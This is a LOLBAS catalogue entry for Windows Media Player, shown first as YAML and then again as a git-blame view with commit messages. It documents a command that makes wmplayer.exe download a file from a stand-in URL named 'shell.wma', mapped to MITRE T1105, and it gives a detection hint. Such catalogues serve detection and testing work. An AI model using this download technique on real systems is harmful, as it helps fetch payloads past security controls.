LOLBAS/yml/OSBinaries/Wmplayer.yml

---
Name: Wmplayer.exe
Description: Windows Media Player
Author: 'Rutger Flohil'
Created: 2024-12-14
Commands:
  - Command: wmplayer.exe "http://example.com/shell.wma"
    Description: Windows Media Player will download the file and attempt to play it. File should be encoded and have a compatible extension like wma. Download is stored in INetCache and needs to be cleaned before use.
    Usecase: Download file from the internet
    Category: Download
    Privileges: User
    MitreID: T1105
    OperatingSystem: Windows 10, Windows 11
    Tags:
      - Download: INetCache
Full_Path:
  - Path: C:\Program Files\Windows Media Player\wmplayer.exe
  - Path: C:\Program Files (x86)\Windows Media Player\wmplayer.exe
Code_Sample:
  - Code: https://pampuna.nl/blog/2024/12/wmplayer.html
Detection:
  - IOC: Network connections originating from wmplayer.exe may be suspicious
Resources:
  - Link: https://pampuna.nl/blog/2024/12/wmplayer.html
Acknowledgement:
  - Person: Rutger Flohil
    Handle: ''
Added technique using wmplayer.exe 2024-12-14 13:15:46 +01:00			`---`
			`Name: Wmplayer.exe`
			`Description: Windows Media Player`
			`Author: 'Rutger Flohil'`
			`Created: 2024-12-14`
			`Commands:`
Newline & altered command 2024-12-14 13:20:18 +01:00			`- Command: wmplayer.exe "http://example.com/shell.wma"`
Added technique using wmplayer.exe 2024-12-14 13:15:46 +01:00			`Description: Windows Media Player will download the file and attempt to play it. File should be encoded and have a compatible extension like wma. Download is stored in INetCache and needs to be cleaned before use.`
			`Usecase: Download file from the internet`
			`Category: Download`
			`Privileges: User`
			`MitreID: T1105`
			`OperatingSystem: Windows 10, Windows 11`
			`Tags:`
			`- Download: INetCache`
			`Full_Path:`
			`- Path: C:\Program Files\Windows Media Player\wmplayer.exe`
			`- Path: C:\Program Files (x86)\Windows Media Player\wmplayer.exe`
			`Code_Sample:`
			`- Code: https://pampuna.nl/blog/2024/12/wmplayer.html`
			`Detection:`
			`- IOC: Network connections originating from wmplayer.exe may be suspicious`
			`Resources:`
			`- Link: https://pampuna.nl/blog/2024/12/wmplayer.html`
Fixed Acknowledgement 2024-12-14 13:22:33 +01:00			`Acknowledgement:`
Added technique using wmplayer.exe 2024-12-14 13:15:46 +01:00			`- Person: Rutger Flohil`
Newline & altered command 2024-12-14 13:20:18 +01:00			`Handle: ''`